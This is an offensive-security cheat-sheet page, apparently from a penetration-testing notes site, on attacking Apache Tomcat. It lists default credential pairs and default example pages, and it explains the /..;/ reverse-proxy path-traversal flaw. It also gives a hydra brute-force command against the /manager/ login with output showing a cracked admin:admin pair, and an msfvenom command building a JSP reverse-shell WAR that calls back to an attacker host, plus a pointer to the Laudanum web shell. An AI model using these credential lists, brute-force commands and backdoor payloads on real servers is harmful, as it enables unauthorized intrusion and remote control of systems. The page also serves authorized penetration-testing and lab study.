Tomcat

Attacking Tomcat Service

Default Credentials

admin:password
admin:
admin:Password1
admin:password1
admin:admin
admin:tomcat
both:tomcat
manager:manager
role1:role1
role1:tomcat
role:changethis
root:Password1
root:changethis
root:password
root:password1
root:r00t
root:root
root:toor
tomcat:tomcat
tomcat:s3cret
tomcat:password1
tomcat:password
tomcat:
tomcat:admin
tomcat:changethis

Default Pages

/examples/jsp/num/numguess.jsp
/examples/jsp/dates/date.jsp
/examples/jsp/snp/snoop.jsp
/examples/jsp/error/error.html
/examples/jsp/sessions/carts.html
/examples/jsp/checkbox/check.html
/examples/jsp/colors/colors.html
/examples/jsp/cal/login.html
/examples/jsp/include/include.jsp
/examples/jsp/forward/forward.jsp
/examples/jsp/plugin/plugin.jsp
/examples/jsp/jsptoserv/jsptoservlet.jsp
/examples/jsp/simpletag/foo.jsp
/examples/jsp/mail/sendmail.jsp
/examples/servlet/HelloWorldExample
/examples/servlet/RequestInfoExample
/examples/servlet/RequestHeaderExample
/examples/servlet/RequestParamExample
/examples/servlet/CookieExample
/examples/servlet/JndiServlet
/examples/servlet/SessionExample
/tomcat-docs/appdev/sample/web/hello.jsp
/docs

Tomcat Path Traversal

Web servers and reverse proxies normalize the request path. For example, the path /image/../image/ is normalized to /images/. When Apache Tomcat is used together with a reverse proxy such as nginx there is a nromalization inconsistency. Tomcat will threat the sequence /..;/ as /../ and normalize the path while reverse proxies will not normalize this sequence and send it to Apache Tomcat as it is. This allows an attacker to access Apache Tomcat resources that are not normally accessible via the reverse proxy mapping.

Reference:

https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/

Brute Force Attack

hydra -L users.txt -P passwords.txt -f 172.16.8.148 -s 8080 http-get /manager/

Example output:

Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-06 21:36:01
[DATA] max 16 tasks per 1 server, overall 16 tasks, 20 login tries (l:4/p:5), ~2 tries per task
[DATA] attacking http-get://172.16.8.148:8080/manager/
[8080][http-get] host: 172.16.8.148   login: admin   password: admin
[STATUS] attack finished for 172.16.8.148 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-05-06 21:36:02

And then, login into Tomcat Manager.

Backdooring Tomcat Manager

msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.8.1 LPORT=4448 -f war -o revshell.war

Or use Laudanum cmd.war shell at /usr/share/laudanum/jsp.

➜  jsp tree
.
├── cmd.war
├── makewar.sh
└── warfiles
    ├── cmd.jsp
    ├── META-INF
    │   └── MANIFEST.MF
    └── WEB-INF
        └── web.xml

4 directories, 5 files

Example of Laudanum WAR Shell

Other Tools

https://github.com/p0dalirius/ApacheTomcatScanner

Update soon....

PreviousCommon Applications NextJoomla

Last updated 1 year ago

hashtagDefault Credentials

hashtagDefault Pages

hashtagTomcat Path Traversal

hashtagBrute Force Attack

hashtagBackdooring Tomcat Manager

hashtagOther Tools